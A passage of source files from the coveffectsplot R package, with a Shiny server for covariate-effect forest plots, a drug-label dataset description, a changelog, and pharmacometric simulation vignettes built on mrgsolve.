cx <- ifelse(x >= 10^digits, as.character(round(x)),
as.character(signif(x + eps, digits)))
}
cx[is.na(x)] <- "0"
d <- gsub("[^0-9]", "", cx)
d <- sub("^0*", "", d)
nd <- nchar(d)
nd[cx == "0"] <- 1
npad <- pmax(0, digits - nd)
pad <- sapply(npad, function(n) paste(rep("0", times = n),
collapse = ""))
has.dec <- grepl("\\.", cx)
add.dec <- ifelse(!has.dec & npad > 0, ".", "")
ifelse(is.na(x), NA, paste(cx, add.dec, pad, sep = ""))
}
###from table1
<file_sep>/inst/shiny/server.R
function(input, output, session) {
maindata <- reactiveVal(NULL)
# If this app was launched from a function that explicitly set an initial dataset
if (exists("coveffectsplot_initdata")) {
maindata(get("coveffectsplot_initdata"))
}
# Set the data source
observeEvent(input$datafile, {
file <- input$datafile$datapath
maindata(read.csv(file, na.strings = c("NA", ".")))
})
observeEvent(input$sample_data_btn, {
data <- get_sample_data()
maindata(data)
})
# Show inputs once the data source exists
observeEvent(maindata(), once = TRUE, {
shinyjs::show("exposurevariables")
shinyjs::show("covariates")
shinyjs::show("covvalueorder")
shinyjs::show("shapebyparamname")
shinyjs::show("vdodgeheight")
shinyjs::show("get_code")
})
# Update the options in different inputs based on data
observe({
df <- maindata()
shiny::req(df)
choices <- unique(df[["paramname"]])
updateSelectizeInput(session, "exposurevariables",
choices = choices, selected = choices[1])
})
observe({
df <- maindata()
shiny::req(df)
df <- df %>%
filter(paramname %in% c(input$exposurevariables))
choices <- unique(df[["covname"]])
updateSelectizeInput(session, "covariates",
choices = choices, selected = choices)
})
observe({
df <- maindata()
shiny::req(df)
df <- df %>%
filter(paramname %in% c(input$exposurevariables)) %>%
filter(covname %in% c(input$covariates))
choices <- as.character(unique(df[["label"]]))
updateSelectizeInput(session, "covvalueorder",
choices = choices, selected = choices)
})
formatstats <- metaReactive2({
shiny::req(maindata())
validate(need(
length(input$covariates) >= 1,
"Please select a least one covariate or All"
))
validate(need(
length(input$covvalueorder) >= 1,
"Please select a least one covariate/All level"
))
df <- maindata()
metaExpr({
df$covname <- factor(df$covname)
df$label <- factor(df$label)
df$exposurename <- df$paramname
sigdigits <- ..(input$sigdigits)
summarydata <- df %>%
group_by(paramname, covname, label) %>%
mutate(
MEANEXP = mid,
LOWCI = lower,
UPCI = upper,
MEANLABEL = signif_pad(MEANEXP, sigdigits),
LOWCILABEL = signif_pad(LOWCI, sigdigits),
UPCILABEL = signif_pad(UPCI, sigdigits),
LABEL = paste0(MEANLABEL, " [", LOWCILABEL, "-", UPCILABEL, "]")
)
summarydata$covvalue <- factor(summarydata$label)
summarydata <- summarydata %>%
filter(covname %in% c(..(input$covariates))) %>%
filter(paramname %in% ..(input$exposurevariables))
summarydata <- as.data.frame(summarydata)
summarydata
})
})
output$refarea <- renderUI({
REF <- ifelse(is.na(input$refvalue),1,input$refvalue)
ymin <- 0.8
ymax <- 1.25
ymaxmax <- REF * ymax *3
ystep <- 0.05
sliderInput(
"refareain",
"Reference Area",
min = 0,
max = ymaxmax,
value = c(ymin, ymax),
step = ystep,
animate = FALSE
)
})
outputOptions(output, "refarea", suspendWhenHidden=FALSE)
observeEvent(input$colourpointrangereset, {
shinyjs::reset("colourpointrange")
})
observeEvent(input$colourbsvrangereset, {
shinyjs::reset("colourbsvrange")
})
observeEvent(input$stripbackfillreset, {
shinyjs::reset("stripbackgroundfill")
})
observeEvent(input$fillrefareareset, {
shinyjs::reset("fillrefarea")
})
observeEvent(input$colorrefvaluereset, {
shinyjs::reset("colorrefvalue")
})
plotdataprepare <- metaReactive2({
shiny::req(formatstats())
metaExpr({
summarydata <- ..(formatstats())
summarydata [, "covname"] <-
factor(summarydata [, "covname"], levels = c(..(input$covariates)))
summarydata [, "label"] <-
factor(summarydata[, "label"] , levels = c(..(input$covvalueorder)))
summarydata <- summarydata %>%
filter(label %in% c(..(input$covvalueorder)))
summarydata [, "paramname"] <-
factor(summarydata[, "paramname"] , levels = c(..(input$exposurevariables)))
summarydata
})
})
output$plot <- metaRender2(renderPlot, {
shiny::req(plotdataprepare())
major_x_ticks <- NULL
minor_x_ticks <- NULL
if (input$customxticks) {
tryCatch({
major_x_ticks <- as.numeric(unique(unlist(strsplit(input$xaxisbreaks, ",")[[1]])))
}, warning = function(w) {}, error = function(e) {})
tryCatch({
minor_x_ticks <- as.numeric(unique(unlist(strsplit(input$xaxisminorbreaks, ",")[[1]])))
}, warning = function(w) {}, error = function(e) {})
}
x_range <- if (input$userxzoom) c(input$lowerxin, input$upperxin) else NULL
ref_value <- if (is.na(input$refvalue)) 1 else input$refvalue
metaExpr({
summarydata <- ..(plotdataprepare())
plot <- forest_plot(
data = summarydata,
facet_formula = ..(input$facetformula),
xlabel = ..(input$xaxistitle),
ylabel = ..(input$yaxistitle),
x_facet_text_size = ..(input$facettextx),
y_facet_text_size = ..(input$facettexty),
x_facet_text_angle = ..(input$facettextxangle),
y_facet_text_angle = ..(input$facettextyangle),
x_facet_text_vjust = ..(input$x_facet_text_vjust),
y_facet_text_vjust = ..(input$y_facet_text_vjust),
x_facet_text_hjust = ..(input$x_facet_text_hjust),
y_facet_text_hjust = ..(input$y_facet_text_hjust),
xy_facet_text_bold = ..(input$boldfacettext),
x_label_text_size = ..(input$xlablesize),
y_label_text_size = ..(input$ylablesize),
table_text_size = ..(input$tabletextsize),
base_size = ..(input$base_size),
theme_benrich = ..(input$theme_benrich),
table_title = escape_newline(..(input$custom_table_title)),
table_title_size = ..(input$table_title_size),
ref_legend_text = escape_newline(..(input$customlinetypetitle)),
area_legend_text = escape_newline(..(input$customfilltitle)),
interval_legend_text = escape_newline(..(input$customcolourtitle)),
interval_bsv_text = escape_newline(..(input$custombsvtitle)),
legend_order = ..(input$legendordering),
combine_area_ref_legend = ..(input$combineareareflegend),
legend_position = ..(input$legendposition),
show_ref_area = ..(input$showrefarea),
ref_area = ..(input$refareain),
show_ref_value = ..(input$showrefvalue),
ref_value = ..(ref_value),
ref_area_col = ..(input$fillrefarea),
ref_value_col = ..(input$colorrefvalue),
interval_col = ..(input$colourpointrange),
bsv_col = ..(input$colourbsvrange),
strip_col = ..(input$stripbackgroundfill),
paramname_shape = ..(input$shapebyparamname),
legend_shape_reverse = ..(input$legendshapereverse),
facet_switch = ..(input$facetswitch),
facet_scales = ..(input$facetscales),
facet_space = ..(input$facetspace),
strip_placement = ..(input$stripplacement),
strip_outline = ..(input$removestrip),
facet_spacing = ..(input$panelspacing),
major_x_ticks = ..(major_x_ticks),
minor_x_ticks = ..(minor_x_ticks),
x_range = ..(x_range),
logxscale = ..(input$logxscale),
show_yaxis_gridlines = ..(input$showyaxisgridlines),
show_xaxis_gridlines = ..(input$showxaxisgridlines),
show_table_facet_strip = ..(input$showtablefacetstrips),
table_facet_switch = ..(input$tablefacetswitch),
show_table_yaxis_tick_label = ..(input$showtableyaxisticklabel),
table_panel_border = ..(input$tablepanelborder),
reserve_table_xaxis_label_space = ..(input$reservetablexaxislabelspace),
table_position = ..(input$tableposition),
plot_table_ratio = ..(input$plottotableratio),
vertical_dodge_height = ..(input$vdodgeheight),
legend_space_x_mult = ..(input$legendspacex),
legend_ncol_interval = ..(input$ncolinterval),
legend_ncol_shape = ..(input$ncolshape),
plot_margin = c(..(input$margintop),..(input$marginright),
..(input$marginbottom),..(input$marginleft)),
table_margin = c(..(input$tabletop),..(input$tableright),
..(input$tablebottom),..(input$tableleft)),
legend_margin = c(..(input$legendtop),..(input$legendright),
..(input$legendbottom),..(input$legendleft)),
parse_xlabel = ..(input$parsexaxistitle),
parse_ylabel = ..(input$parseyaxistitle)
)
plot
})
}, height = function() {
input$height
})
observeEvent(input$get_code, {
if (system.file(package = "shinyAce") == "") {
stop("Please install.packages('shinyAce') and try again.")
}
if (system.file(package = "formatR") == "") {
stop("Please install.packages('formatR') and try again.")
}
code <- expandChain(
"# This code assumes you have a data file named `forest_plot_data.csv`.",
"# You can download this file using the Download button below.",
"#",
"# ------",
"#",
quote({
"# Load required packages"
library(coveffectsplot)
library(dplyr)
library(table1)
"# Load the data (make sure `forest_plot_data.csv` is in your working directory)"
df <- read.csv("forest_plot_data.csv", na.strings = c("NA", "."))
"# Helper functions"
escape_newline <- function(s) {
gsub("\\\\n", "\\\n", s)
}
}),
"# Manipulate data and plot",
output$plot()
)
code <- formatCode(code)
code <- formatR::tidy_source(text = code, width.cutoff = 80, indent = 2)
code <- code$text.tidy
code <- paste(code, collapse = "\n")
showModal(modalDialog(
size = "l", easyClose = TRUE,
shinyAce::aceEditor(
"code_editor", value = code, wordWrap = TRUE
),
footer = tagList(
actionButton("code_copy", "Copy to Clipboard", icon("copy")),
downloadButton("code_download_data", "Download data file"),
modalButton("Dismiss")
)
))
})
observeEvent(input$code_copy, {
if (system.file(package = "clipr") == "") {
stop("Please install.packages('clipr') and try again.")
}
clipr::write_clip(input$code_editor, object_type = "character")
})
output$code_download_data <- downloadHandler(
filename = "forest_plot_data.csv",
content = function(file) {
write.csv(maindata(), file, row.names = FALSE)
}
)
}
<file_sep>/R/data.R
#' Prezista Drug Label Data
#'
#' A dataset containing an excerpt from the official Prezista FDA Drug Label
#' to help in the app exploration.
#'
#' @format A dataset with 33 rows and 6 variables
#' \describe{
#' \item{covname}{Covariate Name, a character variable with two values
#' Protease Inihibitors and Other Antiretrovirals}
#' \item{label}{Covariate value label, a character variable with several possible values}
#' \item{paramname}{Parameter on which the effects are shown,
#' a character variable with three possible values
#' Cmax, AUC and Cmin}
#' \item{mid}{Middle value for the effects, the median from the uncertainty distribution}
#' \item{lower}{Lower value for the effects usually the 5\% from the uncertainty distribution}
#' \item{upper}{Upper value for the effects usually the 95\% from the uncertainty distribution}
#' }
#' @source Table 15 from \url{https://aidsinfo.nih.gov/drugs/397/darunavir/28/professional/}
"prezista"
<file_sep>/NEWS.md
# coveffectsplot 1.0.0.9999
* Added back code generation in the app (contributed by <NAME>)
* bumped the version to 1.0 to correspond with the tutorial paper
* added back pk and pkpd vignettes after fixing R 4.0 issues
# coveffectsplot 0.0.9
* ui improvements and controls for the new arguments
* added `x/y_facet_text_vjust/hjust` arguments for the facets x/y text hjust/vjust
* added `xy_facet_text_bold` argument to control facets text face
* added `facet_spacing` argument to control facets spacing
* added `facet_labeller` argument (function only not in the shiny app)
* added `strip_outline` argument to allow the removal of strip.background
* added `show_yaxis_gridlines` and `show_xaxis_gridlines` arguments to be able to remove axes grid lines
* added `show_ref_value` and `ref_value_col` arguments for better controls on the ref line
* added `plot_margin` argument (controls plot margins)
* added `table_margin` argument (controls table margins)
* added `legend_margin` argument (controls legend margins)
* added `parse_xlabel` and `parse_ylabel` arguments to parse `xlabel`, `ylabel`
* added `table_panel_border` argument to allow the removal of panel.border of the table plot
* added `reserve_table_xaxis_label` argument to allow alignment of switched strips
* added `legend_position` argument to control the legend position
* added `legend_ncol_interval` argument to control number of columns of the interval legend
* added `legend_ncol_shape` argument to control number of columns of the shape legend
* added vignette on pediatric multivariate covariate simulations and removed the pk and pkpd ones
# coveffectsplot 0.0.5
* added an option to have different color and text for BSV (issue submitted by professor <NAME>)
* added two vignettes showing how to simulate a PK , PK/PD and exposure response models from scratch.
* added an argument to control theme_bw: `base_size`
* added theming proposed by <NAME> and arguments to add a table title and size.
* added an argument to ensure alignment of strips between table and plot.
* changing default rounding and padding for table numbers (proposed by <NAME>)
* added options to control the legends number of columns.
* added hooks for more control on margins, strips etc.
# coveffectsplot 0.0.4
* added an option to have a log x axis
* added more control on the table strips
# coveffectsplot 0.0.3
* added an option to return a list of plots to enable further modification to the ggplot(s) if need be
* updated the vignette and examples to demo the new options
* added possibility to choose on which facet to show strips for the table
* fixed a bug that showed up with ggplot dev version by explicitly defining a data.frame to the data argument
* minor ui tweaks to enable named colors in colourpicker
# coveffectsplot 0.0.2
* Removed reference to the old name of the package
* updated vignette and docs
* tweaked the order of the shape legends to reverse
* modified default height of vertical dodging and added an option
* added an option to control legend item x spacing
# coveffectsplot 0.0.1
* Initial Release of coveffectsplot
<file_sep>/vignettes/Exposure_Response_Example.Rmd
---
title: "Exposure-Response Model Assessing the Impact of Covariates on Probabilities of Clinical Outcome"
output:
rmarkdown::html_vignette:
toc: true
df_print: kable
vignette: >
%\VignetteIndexEntry{Exposure_Response_Example}
%\VignetteEngine{knitr::rmarkdown}
%\VignetteEncoding{UTF-8}
---
```{r, include = FALSE}
knitr::opts_chunk$set(
collapse = TRUE,
message =FALSE,
warning =FALSE,
fig.width = 7,
comment = "#>",
dev.args = list(png = list(type = "cairo"))
)
library(coveffectsplot)
library(ggplot2)
library(dplyr)
library(tidyr)
library(mrgsolve)
library(ggridges)
library(ggstance)
library(Rcpp)
theme_set(theme_bw())
nsim <- 100 # for vignette to make it run faster otherwise increase to 1000
#utility function to simulate varying one covariate at a time keeping the rest at the reference
expand.modelframe <- function(..., rv, covcol="covname") {
args <- list(...)
df <- lapply(args, function(x) x[[1]])
df[names(rv)] <- rv
res <- lapply(seq_along(rv), function(i) {
df[[covcol]] <- names(rv)[i]
df[[names(rv)[i]]] <- args[[names(rv)[i]]]
as.data.frame(df)
})
do.call(rbind, res)
}
expit <- function(x) exp(x)/ (1 + exp(x) )
```
## Specifying an Exposure Response Model using `mrgsolve`
Here we illustrate the approach using a Binary response linked to exposure (AUC) via a saturating EMAX function. Weight is a covariate on Clearance. We also have a disease severity categorical covariate on EMAX where patient with severe disease have a lower EMAX.
```{r exprespmodel, collapse=TRUE }
exprespmodel <- '
$PLUGIN Rcpp
$PARAM @annotated
TVCL : 10 : Clearance CL (L/h)
WTCL : 0.75: Weight on CL (ref. 70 kg)
TVEMAX : 5 : Maximum Drug Effect
SEVEMAX : 3 : Severity Reduction of Drug Effect
AUC50 : 7.5 : Area Under the Curve providing half maximal response
BASEP : 0.1 : Baseline Probability of Response
$PARAM @annotated // reference values for covariate
WT : 70 : Weight (kg)
SEV : 0 : Sex (0=Female, 1=Male)
DOSE : 75 : Dose (mg)
$OMEGA @annotated @block
nCL :0.09 : ETA on CL
$PRED
double CL = TVCL *
pow((WT/70.0), WTCL)*exp(ETA(1));
double EMAX = TVEMAX - SEVEMAX*(SEV == 1) ;
double Intercept = log(BASEP/(1-BASEP));
capture CLi = CL;
capture AUC = DOSE/CL;
capture LGST = Intercept + (EMAX*AUC/(AUC50+AUC));
capture P1 = 1/(1+exp(-LGST));
capture DV = R::runif(0,1)< P1 ? 1 : 0;
'
# the typical probability from the model parameters will be :
TypicalProb<- 1/(1+exp(-(log(0.1/(1-0.1)) + (5*75/10/(7.5+75/10)))))
MaxProb<- 1/(1+exp(-(log(0.1/(1-0.1)) + (5*750/10/(7.5+750/10)))))
MinProb<- 1/(1+exp(-(log(0.1/(1-0.1)) + (5*0/10/(7.5+0/10)))))
modexprespsim <- mcode("exprespmodel", exprespmodel)
simdata <- expand.idata(SEV=c(0),
DOSE = c(0,75),
ID = 1:1000) %>%
dplyr::mutate(WT = 70) #exp(rnorm(n(),log(70),0.3)
set.seed(466548)
simout <- modexprespsim %>%
data_set(simdata) %>%
carry.out(WT, DOSE, SEV) %>%
mrgsim()%>%
as.data.frame
```
## Probability of Cure
This is a plot of the disease being cured versus PK exposure by disease severity and by Weight intervals.
```{r exprespmodeplotl, collapse=TRUE }
WT_names <- c(
'70'="Weight: 70 kg"
)
SEV_names <- c(
'0'="Severity: 0 (Not Severe)"
)
probplot<- ggplot(simout, aes(AUC,DV,linetype=factor(SEV))) +
facet_grid( WT~SEV,labeller=labeller(WT=WT_names,SEV=SEV_names))+
geom_point(position=position_jitter(height=0.02,width=0.1),
aes(color=factor(DOSE)),size=1,alpha=0.5)+
geom_line(aes(y=P1),color="black",size=1.1)+
geom_label(data=data.frame(
x=9,y=TypicalProb,label=paste(round(100*TypicalProb,1),"%"),SEV=0),
aes(x=x,y=y,label=label),fill="transparent")+
geom_label(data=data.frame(
x=0.37,y=0.1,label=paste(round(100*0.1,1),"%"),SEV=0),
aes(x=x,y=y,label=label),fill="transparent")+
labs(color="Dose (mg)",y="Probability of Response",
linetype="Severity")+
theme_bw() +
theme(legend.position = "top")
probplot
```
```{r bsvrangeplot, collapse=TRUE }
simoutbsvplacebo <- simout %>%
filter(DOSE==0)%>%
mutate(LGST =LGST)%>%
gather(paramname, paramvalue,LGST,P1)%>%
group_by(paramname)%>%
summarize(P50 = quantile(paramvalue, 0.5)
)
simoutbsv <- simout %>%
mutate(logodds =LGST)%>%
filter(DOSE==75)
# the probability of response at the typical AUC
simoutbsvlong <- simoutbsv %>%
mutate(P1std=P1/TypicalProb) %>%
gather(paramname, paramvalue,P1std,P1)
yvar_names <- c(
'P1std'="Standardized Probability",
'P1'="Probability"
)
pbsvranges<- ggplot(simoutbsvlong, aes(
x = paramvalue,
y = paramname,
fill = factor(..quantile..),
height = ..ndensity..)) +
facet_wrap(paramname~. , scales="free", ncol=1,
labeller=labeller(paramname=yvar_names) ) +
stat_density_ridges(
geom="density_ridges_gradient", calc_ecdf=TRUE,
quantile_lines=TRUE, rel_min_height=0.001, scale=0.9,
quantiles=c(0.05, 0.25, 0.5, 0.75, 0.95)) +
scale_fill_manual(
name="Probability",
values=c("white", "#FF000050", "#FF0000A0", "#FF0000A0", "#FF000050", "white"),
labels = c("(0, 0.05]", "(0.05, 0.25]",
"(0.25, 0.5]", "(0.5, 0.75]",
"(0.75, 0.95]", "(0.95, 1]")) +
theme_bw() +
theme(
legend.position = "none",
axis.text.y = element_blank(),
axis.ticks.y = element_blank(),
axis.title.y = element_blank()) +
labs(x="Parameters", y="") +
scale_x_log10() +
coord_cartesian(expand=FALSE)
pbsvranges
simoutbsvranges <- simoutbsvlong %>%
group_by(paramname)%>%
summarize(
P05 = quantile(paramvalue, 0.05),
P25 = quantile(paramvalue, 0.25),
P50 = quantile(paramvalue, 0.5),
P75 = quantile(paramvalue, 0.75),
P95 = quantile(paramvalue, 0.95))
simoutbsvranges
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# probplot <- probplot +theme_bw(base_size=18)+
# theme(legend.position = "top")
# pbsvranges <- pbsvranges+theme_bw(base_size=22)+
# theme(
# legend.position = "none",
# axis.text.y = element_blank(),
# axis.ticks.y = element_blank(),
# axis.title.y = element_blank())
# ggsave(plot = egg::ggarrange(probplot , pbsvranges,ncol=2),
# "Figure_8_1.png", device="png",type="cairo-png",width = 10, height = 5)
```
## Computing the Odds and Probabilities
Here we show how the odds and probabilities can be computed. We already know that the distribution of AUC depends on the Dose and on the clearance distributions. The model had five parameters shown in <span style="color: red;">red</span>, the dose, disease severity and weight were covariates and are shown in <span style="color: green;">green</span>. A Change in body weight will trigger a change in Clearance which in turn will control the AUC. To define an odds ratio we need to define a reference odds with reference covariate values Severity = 0 and changes in covariate values for example Severity = 1 (everything else being equal). For nonlinear relationships, in addition to the covariate unit change e.g. 25 mg change of dose it is important to define what reference value we are using e.g. A change from Placebo = 0 mg to 25 mg is not the same as a change from the typical dose of 75 mg increasing it to 100 mg.
where:
$$AUC = \left(\frac { \color{green}{Dose}} {\color{red}{CL} \times \left( \frac { \color{green}{Weight}} {70}\right)^{WTCL} \times exp(\eta{CL}) }\right)$$
$$E_{max}= \color{red}{E_{max} \left(intercept \right)} + \color{red}{SevE_{max}}\times\left(\color{green}{Severity} = 1\right) $$
$$log(odds) = \color{red}{intercept} + \left( \frac {E_{max} \times \color{blue}{AUC}} {\color{red}{AUC_{50}} +\color{blue}{AUC} }\right)$$
```{r, collapse=TRUE }
set.seed(678549)
thmeans <- c(10,0.75, #TVCL WTCL
5,3, # TVEMAX SEVEMAX
7.5, # AUC50
0.1) #BASEP
thvariances<- (thmeans*0.15)^2
thecorrelations <- matrix(ncol=length(thmeans),nrow=length(thmeans))
diag(thecorrelations)<- 1
thecorrelations[lower.tri(thecorrelations, diag = FALSE)]<- 0.2
thecorrelations[upper.tri(thecorrelations, diag = FALSE)]<- 0.2
thevarcovmatrix<- diag(sqrt(thvariances))%*%thecorrelations%*%diag(sqrt(thvariances))
sim_parameters <- MASS::mvrnorm(n = nsim, mu=as.numeric(thmeans),
Sigma=thevarcovmatrix, empirical = TRUE)
colnames(sim_parameters) <- colnames(thevarcovmatrix) <- c("TVCL","WTCL",
"TVEMAX","SEVEMAX","AUC50",
"BASEP")
sim_parameters<- as.data.frame(sim_parameters)
reference.values <- data.frame(WT = 70, DOSE = 75, SEV = 0 )
covcomb <- expand.modelframe(
WT = c(50,60,70,80,90),
DOSE = c(0,25,50,75,100,125,150),
SEV = c(0,1),
rv = reference.values)
covcomb <- covcomb[!duplicated(
paste(covcomb$WT,covcomb$WT,covcomb$DOSE,covcomb$SEV)),]
covcomb$ID <- 1:nrow(covcomb)
iter_sims <- NULL
for(i in 1:nsim) {
idata <- as.data.frame(covcomb)
idata$covname<- NULL
data.all <- idata
data.all$TVCL <- as.numeric(sim_parameters[i,1])
data.all$WTCL <- as.numeric(sim_parameters[i,2])
data.all$TVEMAX <- as.numeric(sim_parameters[i,3])
data.all$SEVEMAX <- as.numeric(sim_parameters[i,4])
data.all$AUC50 <- as.numeric(sim_parameters[i,5])
data.all$BASEP <- as.numeric(sim_parameters[i,6])
out <- modexprespsim %>%
data_set(data.all) %>%
carry.out(CL,WT, DOSE, SEV, AUC) %>%
zero_re() %>%
mrgsim()
dfsimunc <- as.data.frame(out%>% mutate(rep = i) )
iter_sims <- rbind(iter_sims,dfsimunc)
}
```
```{r, collapse=TRUE }
stdprobplot<- ggplot(iter_sims, aes(DOSE,P1,col=factor(SEV) ) )+
geom_point(aes(group=interaction(ID,rep)),alpha=0.5,size=3)+
geom_hline(yintercept=TypicalProb)+
facet_grid(SEV~ WT,labeller = label_both)+
labs(y="Probability of Response", colour="Severity")
stdprobplot
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# stdprobplot<- stdprobplot+
# theme(axis.title.y = element_text(size=15),
# legend.position = c(0.8,0.2))+
# scale_y_continuous( sec.axis = sec_axis(~ . /TypicalProb,
# name = "Standardized Probability"))
# stdprobplot
# ggsave("Figure_8_2.png", device="png",type="cairo-png",
# width = 7, height = 4)
```
```{r, fig.height= 7, collapse=TRUE }
iter_sims <- iter_sims %>%
mutate(P1std=P1/TypicalProb)%>%
gather(paramname,paramvalue,P1std)%>%
ungroup() %>%
dplyr::mutate( covname = case_when(
ID== 1 ~ "Weight",
ID== 2 ~ "Weight",
ID== 3 ~ "REF",
ID== 4 ~ "Weight",
ID== 5 ~ "Weight",
ID== 6 ~ "DOSE",
ID== 7 ~ "DOSE",
ID== 8 ~ "DOSE",
ID== 9 ~ "DOSE",
ID== 10 ~ "DOSE",
ID== 11 ~ "DOSE",
ID== 12 ~ "SEV"
),
covvalue =case_when(
ID== 1 ~ paste(WT,"kg"),
ID== 2 ~ paste(WT,"kg"),
ID== 3 ~ "70 kg\nNot Severe\n75 mg",
ID== 4 ~ paste(WT,"kg"),
ID== 5 ~ paste(WT,"kg"),
ID== 6 ~ paste(DOSE,"mg"),
ID== 7 ~ paste(DOSE,"mg"),
ID== 8 ~ paste(DOSE,"mg"),
ID== 9 ~ paste(DOSE,"mg"),
ID== 10 ~ paste(DOSE,"mg"),
ID== 11 ~ paste(DOSE,"mg"),
ID== 12 ~ "Severe"
) )
iter_sims$covname <-factor(as.factor(iter_sims$covname ),
levels = c("Weight","DOSE","SEV","REF"))
iter_sims$covvalue <- factor(as.factor(iter_sims$covvalue),
levels = c("0 mg","25 mg","50 mg",
"100 mg","125 mg","150 mg",
"50 kg","60 kg","80 kg", "90 kg",
"70 kg\nNot Severe\n75 mg", "Severe"))
ggplot(iter_sims,aes(x=paramvalue,y=covvalue))+
stat_density_ridges(aes(fill=factor(..quantile..),height=..ndensity..),
geom = "density_ridges_gradient", calc_ecdf = TRUE,
quantile_lines = TRUE, rel_min_height = 0.001,scale=0.9,
quantiles = c(0.025,0.5, 0.975))+
facet_grid(covname~paramname,scales="free",switch="both",
labeller = labeller(paramname=yvar_names))+
scale_fill_manual(
name = "Probability", values = c("white","#0000FFA0", "#0000FFA0","white"),
labels = c("(0, 0.025]","(0.025, 0.5]","(0.5, 0.975]","(0.975, 1]")
)+
theme_bw()+
theme(axis.title = element_blank(),strip.placement = "outside")
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# last_plot()+theme_bw(base_size = 16)+
# theme(legend.position = "none",
# axis.title = element_blank(),strip.placement = "outside")
# ggsave("Figure_8_3.png", device="png",type="cairo-png",
# width= 7, height = 6,dpi=72)
```
```{r plot3, collapse=TRUE }
coveffectsdatacovrep <- iter_sims %>%
dplyr::group_by(paramname,ID,WT,DOSE,SEV,covname,covvalue) %>%
dplyr::summarize(
mid= median(paramvalue),
lower= quantile(paramvalue,0.025),
upper = quantile(paramvalue,0.975))%>%
dplyr::filter(!is.na(mid))
simoutbsvranges<-simoutbsvranges[simoutbsvranges$paramname=="P1std",]
coveffectsdatacovrepbsv <- coveffectsdatacovrep[coveffectsdatacovrep$covname=="REF",]
coveffectsdatacovrepbsv$covname <- "BSV"
coveffectsdatacovrepbsv$covvalue <- "90% of patients"
coveffectsdatacovrepbsv$label <- "90% of patients"
coveffectsdatacovrepbsv$lower <- simoutbsvranges$P05
coveffectsdatacovrepbsv$upper <- simoutbsvranges$P95
coveffectsdatacovrepbsv2 <- coveffectsdatacovrep[coveffectsdatacovrep$covname=="REF",]
coveffectsdatacovrepbsv2$covname <- "BSV"
coveffectsdatacovrepbsv2$covvalue <- "50% of patients"
coveffectsdatacovrepbsv2$label <- "50% of patients"
coveffectsdatacovrepbsv2$lower <- simoutbsvranges$P25
coveffectsdatacovrepbsv2$upper <- simoutbsvranges$P75
coveffectsdatacovrepbsv<- rbind(coveffectsdatacovrep,coveffectsdatacovrepbsv2,
coveffectsdatacovrepbsv)
coveffectsdatacovrepbsv <- coveffectsdatacovrepbsv %>%
mutate(
label= covvalue,
LABEL = paste0(format(round(mid,2), nsmall = 2),
" [", format(round(lower,2), nsmall = 2), "-",
format(round(upper,2), nsmall = 2), "]"))
coveffectsdatacovrepbsv<- as.data.frame(coveffectsdatacovrepbsv)
coveffectsdatacovrepbsv$label <-factor(as.factor(coveffectsdatacovrepbsv$label ),
levels = c("All Subjects","90% of patients","50% of patients",
"50 kg","60 kg","80 kg","90 kg",
"0 mg","25 mg","50 mg","100 mg","125 mg","150 mg",
"Severe","70 kg\nNot Severe\n75 mg"
))
coveffectsdatacovrepbsv$covname <-factor(as.factor(coveffectsdatacovrepbsv$covname ),
levels = c("Weight","DOSE","SEV","REF","BSV"))
ref_legend_text <- "Reference (vertical line)"
png("./Figure_8_4.png",width =9 ,height = 7,units = "in",res=72)
forest_plot(coveffectsdatacovrepbsv,
strip_placement = "outside",
show_ref_area = FALSE,
show_ref_value=TRUE,
ref_legend_text = ref_legend_text,
plot_table_ratio = 2,
base_size = 12,
table_text_size = 4,
y_label_text_size = 12,
xlabel= " ",
facet_formula = "covname~paramname",
facet_labeller = labeller(paramname=yvar_names),
facet_scales = "free",
logxscale = TRUE,
major_x_ticks = c(0.1,0.25, 0.5,1,1.5),
x_range = c(0.1, 1.5))
dev.off()
```

<file_sep>/data-raw/prezista.R
usethis::use_data_raw()
prezista <- readr::read_csv("./data-raw/druglabel.csv")
usethis::use_data(prezista, overwrite = TRUE)<file_sep>/vignettes/Pediatric_Cov_Sim.Rmd
---
title: "PK Model in Pediatric Patients: Assessing the Impact of a Multivariate Correlated Distribution of Covariates on PK Exposures"
output:
rmarkdown::html_vignette:
toc: true
df_print: kable
vignette: >
%\VignetteIndexEntry{Pediatric_Cov_Sim}
%\VignetteEngine{knitr::rmarkdown}
%\VignetteEncoding{UTF-8}
---
In this vignette we illustrate how to study the effects of covariates in a pediatric population between 2 to 6 years old. Since Age and Weight in kids are highly correlated, we will not simulate varying one covariate at a time rather we will incorporate a **distribution** of realistic Age/Weight pairs.
```{r, include = FALSE}
knitr::opts_chunk$set(
collapse = TRUE,
message =FALSE,
warning =FALSE,
fig.width = 7,
comment = "#>",
dev.args = list(png = list(type = "cairo"))
)
library(coveffectsplot)
library(gamlss.dist)
library(tidyr)
library(dplyr)
library(ggplot2)
library(mrgsolve)
library(ggridges)
library(table1)
library(data.table)
theme_set(theme_bw())
nsubj <- 1000
```
## Specifying A Pediatric Simulation Model
Here we have a simple one-compartment PK model with first-order absorption where clearance and volume are allometrically scaled. The reference subject is a 4 year old female with a weight of 15.9 kg.
* First we plot a typical PK profile with between subject variability (BSV).
```{r pedpkmodel, collapse=TRUE }
pedpkmodelcov <- '
$PARAM @annotated
KA : 0.5 : Absorption rate constant Ka (1/h)
CL : 4 : Clearance CL (L/h)
V : 10 : Central volume Vc (L)
CLWT : 0.75 : Weight on CL (ref. 22.5 kg)
VWT : 1 : Weight on V (ref. 22.5 kg)
$PARAM @annotated // reference values for covariate
WT : 15.8 : Weight (kg)
SEX : 0 : Sex (0=Female, 1=Male)
AGE : 4 : Age (years)
$CMT GUT CENT
$MAIN
double CLi = CL *
pow((WT/15.8), CLWT)*exp(ETA(1));
double Vi = V *
pow((WT/15.8), VWT)*exp(ETA(2));
double KAi = KA;
double Keli = CLi/Vi;
$OMEGA
0.09
0.01 0.09
$ODE
dxdt_GUT = -KAi*GUT;
dxdt_CENT = KAi*GUT-Keli*CENT;
$TABLE
double CP = CENT/ Vi;
$CAPTURE CP KAi CLi Vi WT SEX AGE
'
pedmodsim <- mcode("pedpkmodelcov", pedpkmodelcov)
partab <- setDT(pedmodsim@annot$data)[block=="PARAM", .(name, descr, unit)]
partab <- merge(partab, melt(setDT(pedmodsim@param@data), meas=patterns("*"), var="name"))
knitr::kable(partab)
idata <- data.table(
ID = 1:nsubj,
WT = c(rep(15.8,nsubj/2),
rep(16.2,nsubj/2)),#from Nhanes at 4 years female and male
AGE = 4,
